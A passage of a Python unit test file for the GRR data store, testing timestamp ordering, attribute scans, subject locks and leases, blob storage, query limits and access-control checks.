timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn1(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column1"
# Set 100 values with increasing timestamps for each predicate.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn2(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column2"
# Set 100 values for each predicate with timestamps starting in the
# future and going to the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
# This test along with a previous one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testScanAttribute(self):
data_store.DB.Set("aff4:/A", "aff4:foo", "A value", token=self.token)
for i in range(1, 10):
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " old value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " older value",
timestamp=1900,
token=self.token,
replace=False)
# Something with a different attribute, which should not be included.
data_store.DB.Set(
"aff4:/B/1.1",
"aff4:foo2",
"B 1.1 other value",
timestamp=2000,
token=self.token)
data_store.DB.Set("aff4:/C", "aff4:foo", "C value", token=self.token)
values = [(r[1], r[2])
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", token=self.token)]
self.assertEqual(values, [(2000, "B " + str(i) + " value")
for i in range(1, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", max_records=2, token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(1, 3)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", after_urn="aff4:/B/2", token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B",
u"aff4:foo",
after_urn=rdfvalue.RDFURN("aff4:/B/2"),
max_records=2,
token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 5)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
values = [
r[2]
for r in data_store.DB.ScanAttribute("", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/", "aff4:hash", "h1", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAA",
"aff4:hash",
"h2",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAB",
"aff4:hash",
"h3",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/", "aff4:hash", "h4", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAA",
"aff4:hash",
"h5",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAB",
"aff4:hash",
"h6",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha90000",
"aff4:hash",
"h7",
token=self.token)
(value, _) = data_store.DB.Resolve(
"aff4:/files/hash/generic/sha90000", "aff4:hash", token=self.token)
self.assertEqual(value, "h7")
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash", "aff4:hash", token=self.token)
]
self.assertEqual(values, ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash",
"aff4:hash",
token=self.token,
relaxed_order=True)
]
self.assertEqual(sorted(values), ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
def testScanAttributeRequiresReadAccess(self):
self._InstallACLChecks("r")
v = data_store.DB.ScanAttribute("aff4:/", "aff4:hash", token=self.token)
self.assertRaises(access_control.UnauthorizedAccess, v.next)
def testScanAttributeRequiresQueryAccess(self):
self._InstallACLChecks("q")
v = data_store.DB.ScanAttribute("aff4:/", "aff4:hash", token=self.token)
self.assertRaises(access_control.UnauthorizedAccess, v.next)
def testScanAttributes(self):
for i in range(0, 7):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " value",
timestamp=10000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " old value",
timestamp=9000,
token=self.token,
replace=False)
for i in range(3, 10):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " value",
timestamp=15000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " old value",
timestamp=9500,
token=self.token,
replace=False)
data_store.DB.Set(
"aff4:/C/5a",
"aff4:baz",
"C baz value",
timestamp=9800,
token=self.token)
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"], token=self.token))
self.assertEqual(len(results), 10)
self.assertEqual([s for s, _ in results],
["aff4:/C/" + str(i) for i in range(10)])
self.assertEqual(results[0][1], {"aff4:foo": (10000, "C foo 0 value")})
self.assertEqual(results[5][1], {
"aff4:bar": (15000, "C bar 5 value"),
"aff4:foo": (10000, "C foo 5 value")
})
self.assertEqual(results[9][1], {"aff4:bar": (15000, "C bar 9 value")})
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"],
max_records=5,
token=self.token))
self.assertEqual(len(results), 5)
def testRDFDatetimeTimestamps(self):
test_rows = self._MakeTimestampedRows()
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
# Now MultiResolve by timestamp.
timestamp = (rdfvalue.RDFDatetime(3000), rdfvalue.RDFDatetime(8000))
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token, timestamp=timestamp))
# Timestamp selection is inclusive so we should have 3k-8k.
self._CheckResultTimestamps(result, range(3000, 9000, 1000))
# Now test timestamped attributes.
row_name = "aff4:/attribute_test_row"
attribute_name = "metadata:test_attribute"
attributes_to_set = {
attribute_name: [(i, rdfvalue.RDFDatetime(i))
for i in xrange(1000, 11000, 1000)]
}
data_store.DB.MultiSet(
row_name, attributes_to_set, replace=False, token=self.token)
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
if self.TEST_DELETION:
# Delete some of them.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(2000),
end=rdfvalue.RDFDatetime(4000),
token=self.token)
# Make sure that passing start==end deletes that version.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(6000),
end=rdfvalue.RDFDatetime(6000),
token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
expected_timestamps = [1000, 5000, 7000, 8000, 9000, 10000]
self._CheckResultTimestamps(result, expected_timestamps)
@DBSubjectLockTest
def testDBSubjectLocks(self):
"""Test lock locking."""
predicate = u"metadata:predicateÎñţér"
subject = u"aff4:/metadata:rowÎñţér"
# t1 is holding a lock on this row.
with data_store.DB.DBSubjectLock(subject, token=self.token):
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
token=self.token)
data_store.DB.Set(subject, predicate, "1", token=self.token)
self.assertEqual(
data_store.DB.Resolve(subject, predicate, token=self.token)[0], "1")
t2 = data_store.DB.DBSubjectLock(subject, token=self.token)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
token=self.token)
t2.Release()
t3 = data_store.DB.DBSubjectLock(subject, token=self.token)
self.assertTrue(t3.CheckLease())
t3.Release()
@DBSubjectLockTest
def testDBSubjectLockIndependence(self):
"""Check that locks don't influence each other."""
subject = u"aff4:/metadata:rowÎñţér"
subject2 = u"aff4:/metadata:rowÎñţér2"
t1 = data_store.DB.DBSubjectLock(subject, token=self.token)
# Check it's locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
token=self.token)
# t2 is holding a lock on this row.
t2 = data_store.DB.DBSubjectLock(subject2, token=self.token)
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject2,
token=self.token)
t2.Release()
# Subject 1 should still be locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
token=self.token)
t1.Release()
@DBSubjectLockTest
def testDBSubjectLockLease(self):
default_lease = config_lib.CONFIG["Datastore.transaction_timeout"]
# This needs to be current time or cloud bigtable server will reply with
# deadline exceeded because the RPC is too old.
now = int(time.time())
with test_lib.FakeTime(now):
with data_store.DB.DBSubjectLock(
self.lease_row, token=self.token) as lock:
self.assertEqual(lock.CheckLease(), default_lease)
self.assertTrue(lock.locked)
# Set our expiry time to now + 2*default_lease
lock.UpdateLease(2 * default_lease)
self.assertEqual(lock.CheckLease(), 2 * default_lease)
# Deliberately call release twice, __exit__ will also call
lock.Release()
# Check setting a custom lease time
with test_lib.FakeTime(now):
with data_store.DB.DBSubjectLock(
self.lease_row, token=self.token, lease_time=5000) as lock:
self.assertEqual(lock.CheckLease(), 5000)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiryWithExtension(self):
now = int(time.time())
# Cloud Bigtable RPC library doesn't like long, convert to int
default_lease = int(config_lib.CONFIG["Datastore.transaction_timeout"])
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
self.assertEqual(lock.expires, int(now + default_lease) * 1e6)
lock.UpdateLease(2 * default_lease)
self.assertEqual(lock.expires, int(now + (2 * default_lease)) * 1e6)
# Lock should still be active
with test_lib.FakeTime(now + default_lease + 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
token=self.token)
# Now it is expired
with test_lib.FakeTime(now + (2 * default_lease) + 1):
data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiry(self):
now = int(time.time())
default_lease = int(config_lib.CONFIG["Datastore.transaction_timeout"])
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
self.assertEqual(lock.CheckLease(), default_lease)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
token=self.token)
# Almost expired
with test_lib.FakeTime(now + default_lease - 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
token=self.token)
# Expired
after_expiry = now + default_lease + 1
with test_lib.FakeTime(after_expiry):
lock = data_store.DB.DBSubjectLock(self.lease_row, token=self.token)
self.assertEqual(lock.CheckLease(), default_lease)
self.assertEqual(lock.expires, int((after_expiry + default_lease) * 1e6))
@DBSubjectLockTest
def testLockRetryWrapperTemporaryFailure(self):
"""Two failed attempts to get the lock, then a succcess."""
lock = mock.MagicMock()
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with mock.patch.object(
data_store.DB,
"DBSubjectLock",
side_effect=[
data_store.DBSubjectLockError("1"),
data_store.DBSubjectLockError("2"), lock
]):
lock = data_store.DB.LockRetryWrapper(
"aff4:/something", token=self.token)
# We slept and retried twice
self.assertEqual(mock_time.call_count, 2)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperNoBlock(self):
subject = "aff4:/noblocklock"
lock = data_store.DB.DBSubjectLock(subject, token=self.token)
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(
subject, token=self.token, blocking=False)
self.assertEqual(mock_time.call_count, 0)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperCompleteFailure(self):
subject = "aff4:/subject"
# We need to sync this delete or it happens after we take the lock and
# messes up the test.
data_store.DB.DeleteSubject(subject, token=self.token, sync=True)
lock = data_store.DB.DBSubjectLock(subject, token=self.token)
# By mocking out sleep we can ensure all retries are exhausted.
with mock.patch.object(time, "sleep", return_value=None):
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(subject, token=self.token)
lock.Release()
def testTimestamps(self):
"""Check that timestamps are reasonable."""
predicate = "metadata:predicate"
subject = "aff4:test_timestamps"
# Extend the range of valid timestamps returned from the table to account
# for potential clock skew.
start = long(time.time() - 60) * 1e6
data_store.DB.Set(subject, predicate, "1", token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
end = long(time.time() + 60) * 1e6
self.assertTrue(ts >= start and ts <= end)
self.assertEqual(stored, "1")
def testSpecificTimestamps(self):
"""Check arbitrary timestamps can be specified."""
predicate = "metadata:predicate"
subject = "aff4:/test_specific_timestamps"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "2", timestamp=1000, token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
self.assertEqual(ts, 1000)
self.assertEqual(stored, "2")
def testNewestTimestamps(self):
"""Check that NEWEST_TIMESTAMP works as expected."""
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
# Check we can specify a timestamp
data_store.DB.Set(
self.test_row,
predicate1,
"1.1",
timestamp=10000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate1,
"1.2",
timestamp=20000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.1",
timestamp=11000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.2",
timestamp=22000,
replace=False,
token=self.token)
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
# Should return 2 results. Newest should be first.
values = [x[1] for x in result]
self.assertEqual(len(values), 2)
self.assertListEqual(values, ["1.2", "1.1"])
times = [x[2] for x in result]
self.assertListEqual(times, [20000, 10000])
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
# Should return 1 result - the most recent.
self.assertEqual(len(result), 1)
self.assertEqual(result[0][1], "1.2")
self.assertEqual(result[0][2], 20000)
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self.assertEqual(len(result), 4)
self.assertListEqual([r for r in result if r[0] == "metadata:predicate1"],
[(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate1", "1.1", 10000)])
self.assertListEqual([r for r in result if r[0] == "metadata:predicate2"],
[(u"metadata:predicate2", "2.2", 22000),
(u"metadata:predicate2", "2.1", 11000)])
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token))
# Should only return the latest version.
self.assertItemsEqual(result, [(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate2", "2.2", 22000)])
@DeletionTest
def testTimestampEdgeCases(self):
row = "aff4:/row"
attribute = "metadata:attribute"
for i in range(4):
# First TS is 0!
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row, {attribute: [i]},
timestamp=timestamp,
replace=False,
token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 4)
self.assertItemsEqual([r[2] for r in rows], [0, 1000, 2000, 3000])
data_store.DB.DeleteAttributes(
row, [attribute], start=0, end=0, token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 3)
self.assertItemsEqual([r[2] for r in rows], [1000, 2000, 3000])
def testResolvePrefix(self):
predicate = "metadata:predicate"
subject = "aff4:/test_resolve_regex_prefix"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "3", token=self.token)
results = [
x
for x in data_store.DB.ResolvePrefix(
subject, "metadata:", token=self.token)
]
self.assertEqual(len(results), 1)
# Value
self.assertEqual(results[0][1], "3")
# Predicate
self.assertEqual(results[0][0], predicate)
def testResolveMulti(self):
"""Test regex Multi Resolving works."""
subject = "aff4:/resolve_multi"
predicates = []
predicate_values = []
for i in range(0, 100):
predicate = "metadata:predicate" + str(i)
predicates.append(predicate)
predicate_values.append("Cell " + predicate)
data_store.DB.Set(
subject,
predicate,
"Cell " + predicate,
timestamp=1000,
token=self.token)
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(len(results), 100)
self.assertItemsEqual(predicates, [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
# Now try to query for non existent predicates.
predicates = predicates[:10]
predicate_values = predicate_values[:10]
for i in range(10):
predicates.append("metadata:not_existing" + str(i))
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(10, len(results))
self.assertItemsEqual(predicates[:10], [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
def testBlobs(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
empty_digest = hashlib.sha256().hexdigest()
self.assertFalse(data_store.DB.BlobExists(empty_digest, token=self.token))
self.assertIsNone(data_store.DB.ReadBlob(empty_digest, token=self.token))
@DeletionTest
def testBlobDeletion(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
data_store.DB.DeleteBlob(identifier, token=self.token)
self.assertFalse(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), None)
def testAFF4BlobImage(self):
# 500k
data = "randomdata" * 50 * 1024
identifier = data_store.DB.StoreBlob(data, token=self.token)
# Now create the image containing the blob.
fd = aff4.FACTORY.Create(
"aff4:/C.1235/image", standard.BlobImage, token=self.token)
fd.SetChunksize(512 * 1024)
fd.Set(fd.Schema.STAT())
fd.AddBlob(identifier.decode("hex"), len(data))
fd.Close(sync=True)
# Chunks are written async, we have to flush here.
data_store.DB.Flush()
# Check if we can read back the data.
fd = aff4.FACTORY.Open("aff4:/C.1235/image", token=self.token)
self.assertEqual(
fd.read(len(data)), data,
"Data read back from aff4image doesn't match.")
fd.Close()
def testDotsInDirectory(self):
"""Dots are special in MongoDB, check that they work in rows/indexes."""
for directory in [
"aff4:/C.1240/dir", "aff4:/C.1240/dir/a.b", "aff4:/C.1240/dir/a.b/c",
"aff4:/C.1240/dir/b"
]:
aff4.FACTORY.Create(
directory, standard.VFSDirectory, token=self.token).Close()
# We want the indexes to be written now.
data_store.DB.Flush()
# This must not raise.
aff4.FACTORY.Open(
"aff4:/C.1240/dir/a.b/c", standard.VFSDirectory, token=self.token)
index = data_store.DB.ResolvePrefix(
"aff4:/C.1240/dir", "index:dir/", token=self.token)
subjects = [s for (s, _, _) in index]
self.assertTrue("index:dir/b" in subjects)
self.assertTrue("index:dir/a.b" in subjects)
directory = aff4.FACTORY.Open("aff4:/C.1240/dir", token=self.token)
self.assertEqual(2, len(list(directory.OpenChildren())))
self.assertEqual(2, len(list(directory.ListChildren())))
OPEN_WITH_LOCK_NUM_THREADS = 10
OPEN_WITH_LOCK_TRIES_PER_THREAD = 3
OPEN_WITH_LOCK_SYNC_LOCK_SLEEP = 0.2
@test_lib.SetLabel("large")
@DBSubjectLockTest
def testAFF4OpenWithLock(self):
self.opened = False
self.client_urn = "aff4:/C.0000000000000001"
client = aff4.FACTORY.Create(
self.client_urn, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Set(
client.Schema.LEASED_UNTIL(rdfvalue.RDFDatetime().FromSecondsFromEpoch(
0)))
client.Close()
self.open_failures = 0
self.close_failures = 0
self.results = []
def ParallelThread():
for _ in xrange(self.OPEN_WITH_LOCK_TRIES_PER_THREAD):
t = time.time()
try:
with aff4.FACTORY.OpenWithLock(
self.client_urn,
token=self.token,
blocking=True,
blocking_sleep_interval=self.OPEN_WITH_LOCK_SYNC_LOCK_SLEEP,
blocking_lock_timeout=10):
# We fail if another thread has the object already opened here.
if self.opened:
self.open_failures += 1
self.fail("Double open!")
self.opened = True
logging.info("Thread %s holding lock for 0.5 seconds.",
thread.get_ident())
time.sleep(0.5)
# We fail if someone has closed the object while we are holding it
# opened.
if not self.opened:
self.close_failures += 1
self.fail("Double close!")
self.results.append(thread.get_ident())
self.opened = False
return
except aff4.LockError:
logging.info("Lock failed after %s seconds - retying.",
(time.time() - t))
threads = []
for _ in range(self.OPEN_WITH_LOCK_NUM_THREADS):
t = threading.Thread(target=ParallelThread)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(self.open_failures, 0)
self.assertEqual(self.close_failures, 0)
# Make sure all threads got it eventually.
self.assertEqual(len(self.results), self.OPEN_WITH_LOCK_NUM_THREADS)
def _InstallACLChecks(self, forbidden_access):
if self.acls_installed:
raise RuntimeError("Seems like _InstallACLChecks was called twice in one "
"test")
self.acls_installed = True
data_store.DB.security_manager = test_lib.MockSecurityManager(
forbidden_datastore_access=forbidden_access)
def _ListedMultiResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.MultiResolvePrefix(*args, **kwargs))
def _ListedResolveMulti(self, *args, **kwargs):
return list(data_store.DB.ResolveMulti(*args, **kwargs))
def _ListedResolvePrefix(self, *args, **kwargs):
return list(data_store.DB.ResolvePrefix(*args, **kwargs))
def _FlushedDeleteSubject(self, *args, **kwargs):
# DeleteSubject is not guaranteed to be synchronous. Make sure that
# we flush data store when testing it.
data_store.DB.DeleteSubject(*args, **kwargs)
data_store.DB.Flush()
def testSetChecksWriteAccess(self):
self._InstallACLChecks("w")
self.assertRaises(
access_control.UnauthorizedAccess,
data_store.DB.Set,
self.test_row,
"task:00000001",
rdf_flows.GrrMessage(),
token=self.token)
@DeletionTest
def testDeleteSubjectChecksWriteAccess(self):
self._InstallACLChecks("w")
self.assertRaises(
access_control.UnauthorizedAccess,
self._FlushedDeleteSubject,
self.test_row,
token=self.token)
def testMultiSetChecksWriteAccess(self):
self._InstallACLChecks("w")
self.assertRaises(
access_control.UnauthorizedAccess,
data_store.DB.MultiSet,
self.test_row, {"aff4:size": [(1, 100)],
"aff4:stored": [("foo", 200)]},
token=self.token)
@DeletionTest
def testDeleteAttributesChecksWriteAccess(self):
self._InstallACLChecks("w")
self.assertRaises(
access_control.UnauthorizedAccess,
data_store.DB.DeleteAttributes,
self.test_row, ["metadata:predicate"],
sync=True,
token=self.token)
def testMultiResolvePrefixChecksReadAccess(self):
self._InstallACLChecks("r")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedMultiResolvePrefix, [self.test_row], ["task:"],
token=self.token)
def testMultiResolvePrefixChecksQueryAccessWhenAccessingIndex(self):
self._InstallACLChecks("q")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedMultiResolvePrefix, [self.test_row], ["index:"],
token=self.token)
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedMultiResolvePrefix, [self.test_row], ["task:", "index:"],
token=self.token)
# Check that simple resolve doesn't require query access.
self._ListedMultiResolvePrefix([self.test_row], ["task:"], token=self.token)
def testResolveMultiChecksReadAccess(self):
self._InstallACLChecks("r")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedResolveMulti,
self.test_row, ["task:000000001"],
token=self.token)
def testResolveMultiChecksQueryAccessWhenAccessingIndex(self):
self._InstallACLChecks("q")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedResolveMulti,
self.test_row, ["index:dir/foo"],
token=self.token)
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedResolveMulti,
self.test_row, ["task:00000001", "index:dir/foo"],
token=self.token)
# Check that simple resolve doesn't require query access.
self._ListedResolveMulti(self.test_row, ["task:00000001"], token=self.token)
def testResolvePrefixChecksReadAccess(self):
self._InstallACLChecks("r")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedResolvePrefix,
self.test_row,
"task:",
token=self.token)
def testResolvePrefixChecksQueryAccessWhenAccessingIndex(self):
self._InstallACLChecks("q")
self.assertRaises(
access_control.UnauthorizedAccess,
self._ListedResolvePrefix,
self.test_row,
"index:",
token=self.token)
# Check that simple resolve doesn't require query access.
self._ListedResolvePrefix(self.test_row, "task:", token=self.token)
def testResolveChecksReadAccess(self):
self._InstallACLChecks("r")
self.assertRaises(
access_control.UnauthorizedAccess,
data_store.DB.Resolve,
self.test_row,
"task:000000001",
token=self.token)
def testResolveChecksQueryAccessWhenAccessingIndex(self):
self._InstallACLChecks("q")
self.assertRaises(
access_control.UnauthorizedAccess,
data_store.DB.Resolve,
self.test_row,
"index:dir/foo",
token=self.token)
# Check that simple resolve doesn't require query access.
data_store.DB.Resolve(self.test_row, "task:00000001", token=self.token)
def testLimits(self):
# Create 10 rows with 10 attributes each.
subjects = ["aff4:limittest_%d" % i for i in xrange(10)]
attributes = ["metadata:limittest_%d" % i for i in xrange(10)]
value_idx = 0
for subject in subjects:
for attribute in attributes:
value = "value_%d" % value_idx
value_idx += 1
data_store.DB.Set(subject, attribute, value, token=self.token)
# ResolvePrefix.
for limit in [1, 2, 5, 10, 100]:
results = data_store.DB.ResolvePrefix(
subjects[0], "metadata:", limit=limit, token=self.token)
self.assertEqual(len(results), min(limit, 10))
# MultiResolvePrefix.
for limit in [1, 2, 5, 9, 10, 11, 25, 100, 120]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:", limit=limit, token=self.token))
all_results = []
for subect_res in results.itervalues():
all_results.extend(subect_res)
self.assertEqual(len(all_results), min(limit, 100))
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:limittest_7", limit=limit, token=self.token))
all_results = []
for subect_res in results.itervalues():
all_results.extend(subect_res)
self.assertEqual(len(all_results), min(limit, 10))
# ResolveMulti.
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = list(
data_store.DB.ResolveMulti(
subjects[2], attributes, limit=limit, token=self.token))
self.assertEqual(len(results), min(limit, 10))
def testApi(self):
api = [
"DeleteAttributes", "MultiDeleteAttributes", "DeleteSubject",
"DeleteSubjects", "MultiResolvePrefix", "MultiSet", "Resolve",
"ResolveMulti", "ResolvePrefix", "ScanAttribute", "ScanAttributes",
"Set", "DBSubjectLock"
]
implementation = data_store.DB
reference = data_store.DataStore
for f in api:
implementation_spec = inspect.getargspec(getattr(implementation, f))
reference_spec = inspect.getargspec(getattr(reference, f))
self.assertEqual(implementation_spec, reference_spec,
"Signatures for function %s not matching: \n%s !=\n%s" %
(f, implementation_spec, reference_spec))
@DeletionTest
def testPoolDeleteSubjects(self):
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
